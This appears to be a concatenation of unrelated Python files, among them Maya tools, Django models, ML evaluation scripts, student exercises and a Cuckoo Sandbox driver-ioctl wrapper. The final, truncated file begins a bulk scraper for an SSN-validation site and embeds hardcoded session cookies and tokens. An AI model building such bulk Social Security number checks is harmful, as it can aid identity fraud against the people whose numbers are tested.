(u'Utilities', u'Smooth Toogle', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Utilities\\SmoothToogle\\command.py')]
'''
for menu_name, menu_data in tool_dict.iteritems() :
if menu_name in menu_items:
sub_menu = pm.menuItem(label=menu_name, subMenu=True, p=parent, tearOff=True, postMenuCommandOnce=True)
#sub_menu = pm.subMenuItem(label=menu_name, subMenu=True, p=parent, tearOff=True, postMenuCommandOnce=True)
for app, cmd in menu_data:
script_cmd='execfile(r"{}");'.format(cmd)
pm.menuItem(label=app, command=script_cmd, parent=sub_menu)
def createMenus():
""" setup menu creation for tools in a folder and its subfolders
Args:
rootFolder: path to the start of a folder structure with tool infos in them
"""
# Get gMainWindow from mel command
main_window = mel.eval("$temp=$gMainWindow")
# search and delete old menuName
unload_menus()
# Add userMenu to Maya Menu
tools_menu = pm.menu(menu_name, parent=main_window)
print ('Building Menu : ' + menu_name)
# Add recursive menus
buildMenu(tools_menu)
def unload_menus( ):
# Get gMainWindow from mel command
main_window = mel.eval("$temp=$gMainWindow")
# search and delete old menuName
menu_list = pm.window(main_window, query=True, menuArray=True)
for menu in menu_list:
if menu == menu_name:
pm.menu(menu, edit=True, deleteAllItems=True)
pm.deleteUI(menu)
print ('Unloading Menu : ' + menu_name)
break
|
import os
import numpy as np
import sys
if len(sys.argv) < 2:
print 'Input your data name and groud_truth dir eg. chair ../Data/chair/train_3d/'
sys.exit()
voxel_name = sys.argv[1]
data_dir = sys.argv[2]
# load fake data name
dir = []
def load_name():
for filename in os.listdir('./'+voxel_name):
if filename[0:-5] == voxel_name:
dir.append(filename)
dir.sort()
def IoU_test(ground_truth, fake_data, test_name):
data = np.zeros((64, 64, 64,1))
for i in ground_truth:
data[int(i[0]), int(i[1]), int(i[2]),0] = 1
ground_truth = data
data = np.zeros((64, 64, 64,1))
for i in fake_data:
data[int(i[0]), int(i[1]), int(i[2]),0] = 1
fake_data = data
ground_truth = np.reshape(ground_truth,(64,64,64)) # real
fake_data= np.reshape(fake_data,(64,64,64)) # fake
#### overlap ####
tmp = np.logical_and(fake_data , ground_truth) # fake_data & real
x,y,z = np.where(tmp == 1)
overlap = len(x)
#### diff ####
diff_real = fake_data - tmp
x,y,z = np.where(diff_real == 1)
diff = len(x)
#### real ####
x,y,z = np.where(ground_truth == 1)
real = len(x)
IoU_detail.write(test_name +'\n')
print 'overlap: %d, real: %d, diff: %d' % (overlap,real,diff)
IoU_detail.write('overlap: %d, real: %d, diff: %d' % (overlap,real,diff) +'\n')
iou = (float(overlap)/(real+diff)) # intersection-over-union
print 'IoU :', iou
IoU.write(str(iou)+'\n')
IoU_detail.write('IoU :%f' % iou +'\n')
if __name__ == '__main__':
IoU_detail = open('IoU_detail_' + voxel_name + '.txt','w')
IoU = open('IoU_' + voxel_name +'.txt','w')
load_name()
real_data = os.listdir(data_dir)
real_data.sort()
for i in range(100):
try:
ground_truth = np.loadtxt(data_dir + real_data[i]) # real
test_name = voxel_name + '/' + dir[i] + '/fake_' + dir[i] + '.asc'
fake_data = np.loadtxt(test_name) # fake
except:
print voxel_name + '/' + dir[i] +'/fake_' + dir[i] + '.asc_ERROR'
continue
IoU_test(ground_truth, fake_data, test_name)
IoU_detail.close()
IoU.close()
|
# Generated by Django 2.1.2 on 2018-11-28 13:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datawarehouse', '0009_mahasiswa_temp_cuti'),
]
operations = [
migrations.AddField(
model_name='mahasiswa',
name='temp_status_data',
field=models.NullBooleanField(),
),
]
|
import os,re
def get_filenames_reursively(file_pattern,path_to_search):
fullfilepath = []
for root, d, filenames in os.walk(path_to_search):
for filename in filenames:
fullfilepath.append(os.path.join(root,filename))
if file_pattern:
ffp = []
pattern = re.compile(file_pattern)
for ffpath in fullfilepath:
if pattern.findall(ffpath):
ffp.append(ffpath)
return ffp
else:
return fullfilepath
allfilepaths = get_filenames_reursively(".yaml","/home/tmunjal/Desktop/somefolder")
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='prcolor',
version='0.1.43',
author="Rashe",
description="Color your print()",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/Rashe/p_color",
packages=setuptools.find_packages()
)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^/register$',views.register),
url(r'^/login$',views.login),
url(r'^/weibo/url$', views.users_weibo_url),
url(r'^/weibo/token$', views.users_weibo_token),
] |
echo "hello.py"
|
import os
import sys
import math
import itertools
def setup():
global fileHandle, coordinates, maxX, maxY
filename = input("Enter an input file name (default input2.txt): ")
if filename == "":
filename = "input2.txt"
exists = os.path.isfile("./%s" % filename)
notEmpty = os.path.getsize("./%s" % filename) > 0
if exists and notEmpty:
fileHandle = open ("./%s" % filename, "r")
else:
print ("File doesn't exist or is empty.")
exit
maxX = 0
maxY = 0
coordinates = []
for line in fileHandle:
temp = line.rstrip().split(",")
coordinates.append( ( int(temp[0]), int(temp[1]) ) )
# Save the max X and Y coordinate values
if int(temp[0]) > maxX:
maxX = int(temp[0])
if int(temp[1]) > maxY:
maxY = int(temp[1])
# Adjust for origin
maxX += 1
maxY += 1
fileHandle.close()
def printGrid():
for row in grid:
print (''.join([str(element) for element in row]))
print ()
def plotPoints():
for (label,(x,y)) in enumerate(coordinates):
grid[y][x] = label
def manhattanDistance(posn1, posn2):
return abs(posn1[0] - posn2[0]) + abs(posn1[1] - posn2[1])
def areaIsFinite(area):
finite = True
# An area is infinite if it has a point on the border of the grid.
for x in range(maxX):
if grid[0][x] == area or grid[maxY-1][x] == area:
finite = False
for y in range(maxY):
if grid[y][0] == area or grid[y][maxX-1] == area:
finite = False
return finite
def calculateArea(label):
size = 0
for (x,y) in itertools.product(range(maxX), range(maxY)):
if grid[y][x] == label:
size += 1
return size
def plotClosestLocations():
x = 0
y = 0
closestLocation = 0
for (x,y) in itertools.product(range(maxX), range(maxY)): # For each point in the grid
for (label,location) in enumerate(coordinates): # For each input coord. pair
distance = manhattanDistance((x,y), location)
if label == 0:
closestLocation = distance # Set a default location
grid[y][x] = label
elif distance == closestLocation: # Tied with another location
grid[y][x] = '.'
elif distance < closestLocation: # Current location is closer to (x,y)
closestLocation = distance
grid[y][x] = label
def findLargestFiniteArea():
largestArea = 0
for (label,location) in enumerate(coordinates):
if areaIsFinite(label):
area = calculateArea(label)
if area > largestArea:
largestArea = area
print("Area", label, location, "->", area)
print ("Largest Area:", largestArea)
setup()
global grid
grid = [['.' for x in range(maxX)] for y in range(maxY)]
plotPoints()
#printGrid()
print("Assigning grid points to locations...")
plotClosestLocations()
#printGrid()
print("---Finite Areas---")
findLargestFiniteArea() |
import sys
import numpy as np
import matplotlib.pyplot as plt
log_fname = sys.argv[1]
lite = True
data = {}
cn_ts = 0
with open(log_fname) as f:
for line in f:
cols = line.split()
if len(cols) == 2:
try:
rank = int(cols[0])
ts = float(cols[1])
if rank not in data:
data[rank] = [ts]
else:
data[rank].append(ts)
cn_ts += 1
except:
print(f'unexpected two columns data: {line}')
pass
# Clean up data by excluding ranks that ran for more than 10 mins
# Also collect the first timestamp of each rank so we can sort
# and display it according to the time order (and not the rank order)
deltas = []
first_ts = []
ranks = []
print(f'#ts={cn_ts}')
excluded_ranks = []
for rank, ts_list in data.items():
min_ts=min(ts_list)
max_ts=max(ts_list)
if max_ts - min_ts > 600: # each rank should not run for more than n seconds
excluded_ranks.append(rank)
else:
deltas.append(len(ts_list))
if len(ts_list) > 0:
first_ts.append(ts_list[0])
ranks.append(rank)
sorted_indices = np.argsort(first_ts)
sorted_ranks = [ranks[i] for i in sorted_indices]
print(f'excluded ranks={excluded_ranks}')
# Display average processing time
if not lite:
deltas = np.asarray(deltas)
plt.hist(deltas, bins=100)
thres = np.average(deltas) + ( np.std(deltas) )
plt.title(f"#Evt per rank. avg={np.average(deltas):.2f} max={np.max(deltas):.2f} min={np.min(deltas):.2f}")
plt.show()
# Display weather plot according to the first ts
deltas = []
for rank in sorted_ranks:
ts_list = data[rank]
if rank not in excluded_ranks:
plt.scatter([rank]*len(ts_list), ts_list, s=2, marker='o')
# calculate delta
ts_arr = np.asarray(ts_list)
deltas.extend(list(ts_list - np.roll(ts_list, 1))[1:])
plt.title('Weather plot')
plt.show()
# Plot histogram of deltas
if not lite:
deltas = np.asarray(deltas)
plt.hist(deltas, bins=100)
thres = np.average(deltas) + ( np.std(deltas) )
plt.title(f"Reading time (s) per evt. #points more than {thres:.2f} (s): {len(deltas[deltas>thres]):d} avg={np.average(deltas):.2f} max={np.max(deltas):.2f} min={np.min(deltas):.2f}")
plt.show()
|
# Chanllenge 008
# Ask for the total price of the bill, then ask how many diners there are. Divide the total
# bill by the number of diners and show how much each person must pay.
"""
total_price = int(input("what is the total price of the bill?: "))
number_of_diners = int(input("How many diners are there?: "))
each_person_pay = total_price/number_of_diners
print(f'Each person must pay: {each_person_pay} $')
"""
# Chanllenge 012
# Ask for two numbers. If the first one is larger than the second, display the second number
# first and then the first number, otherwise show the first number first and then the second.
"""
first_number = float(input("Enter the first number: "))
second_number = float(input("Enter the second number: "))
if first_number > second_number:
print(second_number)
print(first_number)
else:
print(first_number)
print(second_number)
"""
# Ask the user to enter a number that is under 20. If they enter a number that is 20 or more,
# display the message “Too high”, otherwise display “Thank you”
"""
number = float(input("Enter a number less than 20: "))
if number >= 20:
print("Too high")
else:
print("Thank you")
"""
# Ask the user to enter a number between 10 and 20 (inclusive). If they enter a number within
# this range, display the message “Thank you”, otherwise display the message “Incorrect answer”.
"""
number = float(input("Enter a number between 10 to 20: "))
if number >= 10 and number <= 20:
print("Thank you")
else:
print("Incorrect answer")
"""
|
import matplotlib
matplotlib.use('Agg')
import numpy as np
from sklearn import metrics
import argparse
import matplotlib.pyplot as plt
from os import path, makedirs
def get_roc(authentic_file, impostor_file):
authentic_score = np.loadtxt(authentic_file, dtype=np.str)
if np.ndim(authentic_score) == 1:
authentic_score = authentic_score.astype(float)
else:
authentic_score = authentic_score[:, 2].astype(float)
authentic_y = np.ones(authentic_score.shape[0])
impostor_score = np.loadtxt(impostor_file, dtype=np.str)
if np.ndim(impostor_score) == 1:
impostor_score = impostor_score.astype(float)
else:
impostor_score = impostor_score[:, 2].astype(float)
impostor_y = np.zeros(impostor_score.shape[0])
y = np.concatenate([authentic_y, impostor_y])
scores = np.concatenate([authentic_score, impostor_score])
return metrics.roc_curve(y, scores, drop_intermediate=True)
def compute_roc(authentic_file, impostor_file):
fprs = []
tprs = []
thrs = []
fpr, tpr, thr = get_roc(authentic_file + '_auc_5.txt', impostor_file + '_auc_5.txt')
fprs.append(fpr)
tprs.append(tpr)
thrs.append(thr)
fpr, tpr, thr = get_roc(authentic_file + '_auc_median.txt', impostor_file + '_auc_median.txt')
fprs.append(fpr)
tprs.append(tpr)
thrs.append(thr)
fpr, tpr, thr = get_roc(authentic_file + '_auc_95.txt', impostor_file + '_auc_95.txt')
fprs.append(fpr)
tprs.append(tpr)
thrs.append(thr)
return fprs, tprs, thrs
def plot(title, fpr1, tpr1, thr1, l1, fpr2, tpr2, thr2, l2,
fpr3, tpr3, thr3, l3, fpr4, tpr4, thr4, l4):
plt.rcParams["figure.figsize"] = [6, 4.5]
plt.rcParams['font.size'] = 12
plt.grid(True, zorder=0, linestyle='dashed')
plt.gca().set_xscale('log')
begin_x = 1e-5
end_x = 1e0
print(begin_x, end_x)
plt.plot(fpr1[1], tpr1[1], 'C1', label=l1)
# plt.plot(fpr1[2], tpr1[2], 'C1')
plt.fill(np.append(fpr1[0], fpr1[2][::-1]), np.append(tpr1[0], tpr1[2][::-1]), facecolor='C1', alpha=0.5)
if l2 is not None:
plt.plot(fpr2[1], tpr2[1], 'C0', label=l2)
# plt.plot(fpr2[2], tpr2[2], 'C0')
plt.fill(np.append(fpr2[0], fpr2[2][::-1]), np.append(tpr2[0], tpr2[2][::-1]), facecolor='C0', alpha=0.5)
if l3 is not None:
plt.plot(fpr3[1], tpr3[1], 'C3', label=l3)
# plt.plot(fpr3[2], tpr3[2], 'C3')
plt.fill(np.append(fpr3[0], fpr3[2][::-1]), np.append(tpr3[0], tpr3[2][::-1]), facecolor='C3', alpha=0.5)
if l4 is not None:
plt.plot(fpr4[1], tpr4[1], 'C4', label=l4)
plt.fill(np.append(fpr4[0], fpr4[2][::-1]), np.append(tpr4[0], tpr4[2][::-1]), facecolor='C4', alpha=0.5)
plt.legend(loc='lower right', fontsize=12)
plt.xlim([begin_x, end_x])
# plt.xlim([0, 1])
# plt.ylim([0, 1])
plt.ylim([0.7, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Match Rate')
plt.tight_layout(pad=0)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Plot ROC Curve')
parser.add_argument('-authentic1', '-a1', help='Authentic scores 1.')
parser.add_argument('-impostor1', '-i1', help='Impostor scores 1.')
parser.add_argument('-label1', '-l1', help='Label 1.')
parser.add_argument('-authentic2', '-a2', help='Authentic scores 2.')
parser.add_argument('-impostor2', '-i2', help='Impostor scores 2.')
parser.add_argument('-label2', '-l2', help='Label 2.')
parser.add_argument('-authentic3', '-a3', help='Authentic scores 3.')
parser.add_argument('-impostor3', '-i3', help='Impostor scores 3.')
parser.add_argument('-label3', '-l3', help='Label 3.')
parser.add_argument('-authentic4', '-a4', help='Authentic scores 4.')
parser.add_argument('-impostor4', '-i4', help='Impostor scores 4.')
parser.add_argument('-label4', '-l4', help='Label 4.')
parser.add_argument('-title', '-t', help='Plot title.')
parser.add_argument('-dest', '-d', help='Folder to save the plot.')
parser.add_argument('-name', '-n', help='Plot name (without extension).')
args = parser.parse_args()
fpr2, tpr2, thr2 = (None, None, None)
fpr3, tpr3, thr3 = (None, None, None)
fpr4, tpr4, thr4 = (None, None, None)
fpr1, tpr1, thr1 = compute_roc(args.authentic1, args.impostor1)
if args.authentic2 is not None:
fpr2, tpr2, thr2 = compute_roc(args.authentic2, args.impostor2)
if args.authentic3 is not None:
fpr3, tpr3, thr3 = compute_roc(args.authentic3, args.impostor3)
if args.authentic4 is not None:
fpr4, tpr4, thr4 = compute_roc(args.authentic4, args.impostor4)
plot(args.title, fpr1, tpr1, thr1, args.label1,
fpr2, tpr2, thr2, args.label2, fpr3, tpr3, thr3, args.label3,
fpr4, tpr4, thr4, args.label4)
if not path.exists(args.dest):
makedirs(args.dest)
plot_path = path.join(args.dest, args.name + '.png')
plt.savefig(plot_path, dpi=150)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.urls import reverse
# Create your models here.
class Asteroide(models.Model):
nombre = models.CharField(max_length=200)
diametro_min = models.CharField(max_length=200)
diametro_max = models.CharField(max_length=200)
fecha = models.DateField()
url = models.URLField()
is_dangerous = models.BooleanField()
def get_absolute_url(self):
return reverse('asteroide-detail', kwargs={'pk': self.pk}) |
# Copyright (C) 2016-2018 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import ctypes
import logging
import socket
import struct
from lib.common.defines import (
KERNEL32, GENERIC_READ, GENERIC_WRITE, FILE_SHARE_READ, FILE_SHARE_WRITE,
OPEN_EXISTING
)
from lib.common.rand import random_string
log = logging.getLogger(__name__)
# Random name for the zer0m0n driver.
driver_name = random_string(16)
CTL_CODE_BASE = 0x222000
class Ioctl(object):
def __init__(self, pipepath):
self.pipepath = pipepath
def invoke(self, ctlcode, value, outlength=0x1000):
device_handle = KERNEL32.CreateFileA(
"\\\\.\\%s" % self.pipepath, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None
) % 2**32
if device_handle == 0xffffffff:
# Only report an error if the error is not "name not found",
# indicating that no kernel analysis is currently taking place.
if KERNEL32.GetLastError() != 2:
log.warning(
"Error opening handle to driver (%s): %d!",
driver_name, KERNEL32.GetLastError()
)
return False
out = ctypes.create_string_buffer(outlength)
length = ctypes.c_uint()
ret = KERNEL32.DeviceIoControl(
device_handle, ctlcode, value, len(value), out,
ctypes.sizeof(out), ctypes.byref(length), None
)
KERNEL32.CloseHandle(device_handle)
if not ret:
log.warning(
"Error performing ioctl (0x%08x): %d!",
ctlcode, KERNEL32.GetLastError()
)
return False
return out.raw[:length.value]
class Zer0m0nIoctl(Ioctl):
actions = [
"addpid",
"cmdpipe",
"channel",
"dumpmem",
"yarald",
"getpids",
"hidepid",
"dumpint",
"resultserver",
]
def invoke(self, action, buf):
if action not in self.actions:
raise RuntimeError("Invalid ioctl action: %s" % action)
return Ioctl.invoke(
self, CTL_CODE_BASE + self.actions.index(action) * 4, buf,
)
def addpid(self, pid):
return self.invoke("addpid", struct.pack("Q", pid))
def cmdpipe(self, pipe):
return self.invoke("cmdpipe", "\x00".join(pipe + "\x00"))
def channel(self, pipe):
return self.invoke("channel", "\x00".join(pipe + "\x00"))
def dumpmem(self, pid):
return self.invoke("dumpmem", struct.pack("Q", pid))
def yarald(self, rulepath):
return self.invoke("yarald", open(rulepath, "rb").read())
def getpids(self):
pids = self.invoke("getpids", "pids") or ""
return struct.unpack("Q"*(len(pids)/8), pids)
def hidepid(self, pid):
return self.invoke("hidepid", struct.pack("Q", pid))
def dumpint(self, ms):
return self.invoke("dumpint", struct.pack("I", ms))
def resultserver(self, ip, port):
# Just a regular SOCKADDR structure, up to 128 bytes
if ":" in ip:
rs = struct.pack("<H", socket.AF_INET6)
rs += struct.pack("!H", port)
rs += socket.inet_pton(socket.AF_INET6, ip)
else:
rs = struct.pack("<H", socket.AF_INET)
rs += struct.pack("!H", port)
rs += socket.inet_aton(ip)
return self.invoke("resultserver", rs)
zer0m0n = Zer0m0nIoctl(driver_name)
|
from django.contrib import admin
from ebooks.models import Ebook, Review
admin.site.register(Ebook)
admin.site.register(Review)
|
#Python program to check if the number is palindrone or not.
#Solution:
inp = input("Enter the number to check:")
def check_palindrone(str):
for i in range(0, int(len(str)/2)):
if str[i] != str[len(str)-i-1]:
return False
return True
result = check_palindrone(inp)
if (result):
print("Yes,",inp,"is palindrone.")
else:
print("No,",inp,"is not palindrone.")
'''Output:
Enter the number to check:12321
Yes, 12321 is palindrone.
Process finished with exit code 0
''' |
# -*- coding=utf-8 -*-
# @Time:2020/10/13 2:45 下午
# Author :王文娜
# @File:五感图.py
# @Software:PyCharm
from lxml import etree
parse_html=etree.HTML(html)
r_list=parse_html.xpath('')
|
#!/usr/bin/env python
'''
**********************************************************************
* Filename : CreateLogFile.py
* Description : Takes an image from the camera and an angle from the servo
* and writes them to a CSV file
* Author : Joe Kocsis
* E-mail : Joe.Kocsis3@gmail.com
* Website : www.github.com/jkocsis3/tanis
**********************************************************************
'''
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
import cv2
import os
from angela.msg import steermsg
class CreateLogFile(object):
_DEBUG = True
_DEBUG_INFO = 'DEBUG "CreateLogFile.py":'
def __init__(self, debug=False):
self._DEBUG = debug
rospy.loginfo(self._DEBUG_INFO + "Initiating Node")
rospy.init_node("Collate_Training_Data")
self.bridge = CvBridge()
self.counter = 0
self.currentImage = 0
self.currentAngle = 0
self.savePath = os.path.join('/home/pi/tanis/Images/')
self.file = open(self.savePath + 'data.csv', 'a')
self.image_sub = rospy.Subscriber("/angela/cameras/main/capture", Image, self.SetImage)
self.speed_sub = rospy.Subscriber('/angela/steer/setAngle', steermsg, self.SetAngle)
# stops the node from exiting
rospy.spin()
self.file.close()
# Whenever an image message is recieved, set the incoming image to the current image.
def SetImage(self, data):
if self._DEBUG:
rospy.loginfo("setting image")
self.currentImage = self.bridge.imgmsg_to_cv2(data, desired_encoding="rgb8")
self.CollateAndSaveData()
def SetAngle(self, data):
if self._DEBUG:
rospy.loginfo("setting angle")
self.currentAngle = data.angle
def CollateAndSaveData(self):
if self._DEBUG:
rospy.loginfo("Saving Data")
cv2.imwrite(self.savePath + (str(self.counter) + '.jpg'), self.currentImage)
self.file.write(str(self.counter) + ', ' + str(self.currentAngle) + '\n')
self.counter += 1
if __name__ == '__main__':
CreateLogFile()
|
from collections import MutableMapping
def flatten(d, parent_key='', sep='/'):
result = []
for k, v in d.iteritems():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, MutableMapping):
result.extend(flatten(v, new_key, sep=sep).iteritems())
else:
result.append((new_key, v))
return dict(result) or {parent_key: ''}
|
#!/usr/bin/env python
PACKAGE = "hektar"
from dynamic_reconfigure.parameter_generator_catkin import *
gen = ParameterGenerator()
gen.add("speed", int_t, 0, "wheel speed value", 127, 0, 127)
gen.add("variation_factor", double_t, 0, "scalar multiplier for wheel speed", 1.0, 0.0, 5.0)
gen.add("offset_multiplier", double_t, 0, "scalar multiplier for left wheel offset", 1.0, 0.0, 2.0)
gen.add("offset_addition", int_t, 0, "added value for left wheel offset", 0, -50, 50)
exit(gen.generate(PACKAGE, "hektar", "WheelControl"))
|
def intParaBinario(n):
remstack = Stack()
while decNumber > 0:
rem = decNumber % 2
remstack.push(rem)
decNumber = decNumber // 2
return remstack
entrada = input().split(" ")
A = intParaBinario(entrada[0])
B = intParaBinario(entrada[1])
print(A)
print(B) |
def remove_duplicates_in_array(array):
unique_elem = set()
for elem in array:
if elem not in unique_elem:
yield elem
unique_elem.add(elem)
def select_place_from_top_list(top_list, prize):
for index, elem in enumerate(top_list, 1):
if prize >= elem:
return index
elif index == len(top_list):
return index + 1
def get_history_successes(top_list, successes_data_team):
history_successes = []
sum_prev_results = 0
top_list = list(remove_duplicates_in_array(top_list))
for prize in successes_data_team:
sum_prev_results += prize
place = select_place_from_top_list(top_list, sum_prev_results)
history_successes.append(place)
return history_successes
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TODO: Importez vos modules ici
import numpy as np
import random as r
# TODO: Définissez vos fonctions ici (il en manque quelques unes)
def linear_values() -> np.ndarray:
return np.linspace(-1.3,2.5,64)
def coordinate_conversion(cartesian_coordinates: np.ndarray) -> np.ndarray:
polar_coordinates = []
for i in cartesian_coordinates:
r = np.sqrt(i[0] ** 2 + i[1] ** 2)
t = np.arctan2(i[1], i[0])
polar_coordinates.append((r,t))
return polar_coordinates
def polar(cartesian_coordinates: np.ndarray):
a = np.zeros([len(cartesian_coordinates), 2])
for i in range(len(cartesian_coordinates)):
rho = np.sqrt(cartesian_coordinates[i][0] ** 2 + cartesian_coordinates[i][1] ** 2)
phi = np.arctan2(cartesian_coordinates[i][1], cartesian_coordinates[i][0])
polar_coordinate = (rho, phi)
a[i] = polar_coordinate
return np.array([a])
def find_closest_index(values: np.ndarray, number: float) -> int:
differences = []
for i in values:
differences.append(abs(i - number))
return differences.index(min(differences))
if __name__ == '__main__':
# TODO: Appelez vos fonctions ici
# for value in linear_values():
# print(value)
print(coordinate_conversion([(0,0),(1,1),(2,2),(3,3)]))
print(polar([(0,0),(1,1),(2,2),(3,3)]))
#print(find_closest_index([4,1,7,2,3,10,5,9,100,65,56,78],60))
|
# Какие пути соответствуют URI схеме и могут быть использованы в командах shell-клиента HDFS?
file:///
file:///home/user/
/tmp/output.txt
hdfs://hdfs/
|
l=[1,2,3,4,5,6,78,9,10,12]
c,d=0
for x in l:
if(x%2==0):
c+=1
else:
d+=1
print("even numbers are {} and odd numbers are {}".format(c,d))
print(len(l))
|
from QPlayer import QPlayer
from SpindelTable import Table
from Deck import generateDeck
import json
import itertools
import matplotlib.pyplot as plt
import random
for ThousandGameIter in range(20):
# Run 100 games
wonGames = 0
N = 1000
qPlayer = QPlayer(None, loadFromFile = True, rewardEmpty=True, punishMove=True)
qPlayer.gambleChance = 1.0
won = []
for i in range(N):
print("Game: " + str(i) + " Set " + str(ThousandGameIter))
"""
table = Table(-1)
deck = generateDeck(True, 'quarter-one-color')
for randStackNo in (random.randint(0,9) for i in range(13)):
table.stacks[randStackNo].faceUpCards.append(deck.pop())
"""
table = Table(1)
qPlayer.newTable(table)
qPlayer.gambleChance -= 1.0/N
lastPile = False
# Game loop
while True:
# distribute loop
n = 0
while True:
# Prevent going too many moves
n += 1
if n > 1000:
break
# Print every something
if not n % 1000:
pass
#print(n)
possMoves = table.possibleMoves()
if not possMoves:
break
qPlayer.move()
#input("Press Enter to continue...")
if table.isWon():
break
if table.piles:
table.distribute()
print("Distributing")
if not table.piles:
lastPile = True
continue
break
if table.isWon():
wonGames += 1
print(f" WON ({wonGames} of {i})")
won.append(1)
else:
print(f" lost(won {wonGames} of {i})")
won.append(0)
# Save the Q matrix in a json file
jsonDump = json.dumps(qPlayer.Q)
f = open("Q.json","w")
f.write(jsonDump)
f.close()
# Make graph over won games
print(f"Number of won games: {wonGames} out of {N}")
cumsum = list(itertools.accumulate(won))
movingaverage = [sum(won[n:n+int(N/10)])/int(N/10) for n in range(N-int(N/10))]
plt.plot(range(int(N/10), N), movingaverage)
#plt.show()
plt.savefig(f"out{ThousandGameIter}.png")
|
from math import log
from torch import nn
from yarp.envs.torchgymenv import TorchGymEnv
from yarp.envs.unsupervised_env import UnsupervisedEnv
from yarp.policies.tanhgaussianpolicy import TanhGaussianMLPPolicy
from yarp.networks.valuemlp import SingleHeadQMLP
from yarp.networks.mlp import MLP
from yarp.networks.mlp_discriminator import MLPDiscriminator
from yarp.replaybuffers.unsupervisedreplaybuffer import UnsupervisedReplayBuffer
from yarp.algos.sac import SAC
from yarp.algos.diayn import DIAYN
from yarp.algos.diayn_prior import DIAYNWithPrior
from yarp.experiments.experiment import Experiment
from drivingenvs.vehicles.ackermann import AckermannSteeredVehicle
from drivingenvs.envs.base_driving_env import BaseDrivingEnv
from drivingenvs.envs.driving_env_with_vehicles import DrivingEnvWithVehicles
from drivingenvs.priors.lane_following import LaneFollowing
contexts = 10
max_steps = 50
max_rew = -max_steps * log(1/contexts)
print('contexts = {}, max_steps = {}, max_rew = {}'.format(contexts, max_steps, max_rew))
veh = AckermannSteeredVehicle((4, 2))
env = DrivingEnvWithVehicles(veh, distance=200.0, n_lanes = 5, dt=0.2, max_steps = max_steps, start_lane = 2)
env = UnsupervisedEnv(env, context_dim=contexts)
print(env.reset())
prior = LaneFollowing(env.wrapped_env)
policy = TanhGaussianMLPPolicy(env, hiddens = [256, 256], hidden_activation=nn.ReLU)
qf1 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
target_qf1 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
qf2 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
target_qf2 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
buf = UnsupervisedReplayBuffer(env, capacity=int(1e6))
sac = SAC(env, policy, qf1, target_qf1, qf2, target_qf2, buf, discount = 0.95, reward_scale=1/max_rew, learn_alpha=True, alpha=0.01, steps_per_epoch=1000, qf_itrs=1000, qf_batch_size=256, target_update_tau=0.005, epochs=150)
disc = MLPDiscriminator(in_idxs=[2, 7, 8, 9, 10, 11], outsize=env.context_dim, hiddens = [300, 300])
print(disc)
diayn = DIAYNWithPrior(env, buf, disc, sac, prior, beta = 0.05)
experiment = Experiment(diayn, 'diayn_lane_follow_beta0.05_disc_v_laneid_traffic', save_every=5, save_logs_every=5)
experiment.run()
|
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import time
import requests
import json
import sys
sys.path.append("..")
from urllib import parse
import xlrd
from xlutils.copy import copy
import threadpool
import threading
import db
import Chrome_driver
def get_headers():
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'accept-encoding': 'gzip, deflate',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
'content-length': '61',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://www.ssnregistry.org',
'referer': 'https://www.ssnregistry.org/validate',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
}
'''
to change
XSRF-TOKEN
laravel_session
'''
cookies = {
'__cfduid':'dcb0dbd4e34dbf751bfa5e6d1042292831580802619',
'_ga':'GA1.2.1459630284.1581131618',
'_gid':'GA1.2.539623217.1581131620',
'__gads':'',
'ID':'3c7df452b92ae7c0',
'T':'1580802622',
'S':'ALNI_MYkIzFc-_-4o_7H1PUHcCnX8SNCZA',
'XSRF-TOKEN':'eyJpdiI6IkRZRkdhVE4wWlkrMUNNckVCY1A4MVE9PSIsInZhbHVlIjoibllLRUdvbTZPVmsxT2VsRVpXNkF0N1R1WU02OU5OSmx1WGQ1UTEyTDlYMWxNMm9tbGhjRTJ5Q3NSQjdzT0Y4OU1abmZQTHZuV1Q3S1VDWVFGXC9zNWRnPT0iLCJtYWMiOiJhYTk4ZjhmMDlhYjc4NTUyZjQwMTZkZDI0NGU4OGQ5NmUxYTEzMzhiZjIyYTMxZTU2ZGE0M2RhMDRkMDAxZGE2In0',
